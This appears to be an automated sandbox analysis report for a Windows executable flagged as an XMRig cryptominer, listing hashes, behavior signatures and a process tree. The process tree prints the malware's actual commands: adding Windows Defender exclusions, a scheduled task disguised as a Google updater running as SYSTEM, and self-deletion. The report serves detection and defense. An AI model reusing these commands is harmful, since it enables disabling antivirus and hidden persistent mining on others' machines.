Resubmissions

11/02/2025, 16:33 UTC

250211-t2ztsstkey 10

11/02/2025, 16:33 UTC

250211-t2zh2atkex 10

11/02/2025, 16:33 UTC

250211-t2yxhatkew 10

11/02/2025, 16:33 UTC

250211-t2nrjasqdk 10

24/10/2024, 20:12 UTC

241024-yyvg5asemn 10

24/10/2024, 20:11 UTC

241024-yygk9ssemk 10

24/10/2024, 20:11 UTC

241024-yygahasemj 10

24/10/2024, 20:11 UTC

241024-yyd55sselq 10

24/10/2024, 20:08 UTC

241024-yw247asdqp 10

24/10/2024, 20:08 UTC

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    900s
  • max time network
    889s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/02/2025, 16:33 UTC

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (24).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 1 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies Internet Explorer settings 1 TTPs 26 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3464
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (24).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (24).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:3680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:220
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (24).exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:516
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4580
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:2500
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4576
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
              PID:4620
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
              2⤵
                PID:2208
            • C:\Program Files\Google\Chrome\updater.exe
              "C:\Program Files\Google\Chrome\updater.exe"
              1⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3688
            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE1QzFDNzQtNzA3Ni00OTFCLTg3RjgtOTE0RUJGQTUyNDQwfSIgdXNlcmlkPSJ7RUUyNTg5RDYtQUE0Qy00OEY5LTkyOUEtOUM0MDUwRjgxNThDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MUFCNkU0QzgtN0U4Ni00N0U3LUE4QUEtNjhFRTM2MjNDNjMwfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY0MzMiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODc1OTU2NTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1NDI2ODkyNTgwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
              1⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:792
            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\MicrosoftEdge_X64_132.0.2957.140.exe
              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:4412
              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe
                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
                2⤵
                • Boot or Logon Autostart Execution: Active Setup
                • Executes dropped EXE
                • Installs/modifies Browser Helper Object
                • Drops file in Program Files directory
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                • System policy modification
                PID:4656
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x228,0x22c,0x230,0x224,0x234,0x7ff63774a818,0x7ff63774a824,0x7ff63774a830
                  3⤵
                  • Executes dropped EXE
                  PID:2712
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
                  3⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3104
                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe
                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff63774a818,0x7ff63774a824,0x7ff63774a830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:3692
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4644
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x228,0x22c,0x230,0x224,0x234,0x7ff76a6ca818,0x7ff76a6ca824,0x7ff76a6ca830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:2844
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:2560
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff76a6ca818,0x7ff76a6ca824,0x7ff76a6ca830
                    4⤵
                    • Executes dropped EXE
                    PID:4560
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3496
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff76a6ca818,0x7ff76a6ca824,0x7ff76a6ca830
                    4⤵
                    • Executes dropped EXE
                    PID:1352
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness
              1⤵
                PID:1516
              • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE1QzFDNzQtNzA3Ni00OTFCLTg3RjgtOTE0RUJGQTUyNDQwfSIgdXNlcmlkPSJ7RUUyNTg5RDYtQUE0Qy00OEY5LTkyOUEtOUM0MDUwRjgxNThDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntEOTBGRTA2NS0wMDkxLTREMjYtOUUxOC04MjVCNjI2M0U4NkV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE5NS40MyIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjQiIGNvaG9ydD0icnJmQDAuMjciPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iNCIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7RjVBRUEzNTEtMDI3MC00MzM0LTkwMkQtRkQ2RjlBMDEwMjMyfSIvPjwvYXBwPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSI5Mi4wLjkwMi42NyIgbmV4dHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjQiIGlzX3Bpbm5lZF9zeXN0ZW09InRydWUiIGxhc3RfbGF1bmNoX2NvdW50PSIxIiBsYXN0X2xhdW5jaF90aW1lPSIxMzM4MzQyMTQwNzY1MzIxNDAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU1MDY4OTI1MzUiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTUwNzA0OTE5OCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iODAxODkyMzYwMyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzA3NDAwMzZhLTRlMTgtNDU2ZC05NmZhLWQxZDljNGNhNDY3Nj9QMT0xNzM5ODk3MjUxJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWFQSEI2clk2eFJPS3AlMmJPN2UwZUUwZGNUVzVETkF3REhzS0hOJTJmZWl6YzVqc3Vxbzl2TFZBMDV4QmQxaEw3ckViS1ZrTnV6Y1JTVDdRVk5OSEVwRG5RQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjgwMTg5MjM2MDMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzA3NDAwMzZhLTRlMTgtNDU2ZC05NmZhLWQxZDljNGNhNDY3Nj9QMT0xNzM5ODk3MjUxJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWFQSEI2clk2eFJPS3AlMmJPN2UwZUUwZGNUVzVETkF3REhzS0hOJTJmZWl6YzVqc3Vxbzl2TFZBMDV4QmQxaEw3ckViS1ZrTnV6Y1JTVDdRVk5OSEVwRG5RQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3NzE4MDIxNiIgdG90YWw9IjE3NzE4MDIxNiIgZG93bmxvYWRfdGltZV9tcz0iMjQ0Mzc1Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjgwMTg5MjM2MDMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iODAzMjM2MTIzOSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTEzNzgyOTkzMSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjMyNTAiIGRvd25sb2FkX3RpbWVfbXM9IjI1MTE3MiIgZG93bmxvYWRlZD0iMTc3MTgwMjE2IiB0b3RhbD0iMTc3MTgwMjE2IiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSIxMTA1NDciLz48cGluZyBhY3RpdmU9IjEiIGE9IjQiIH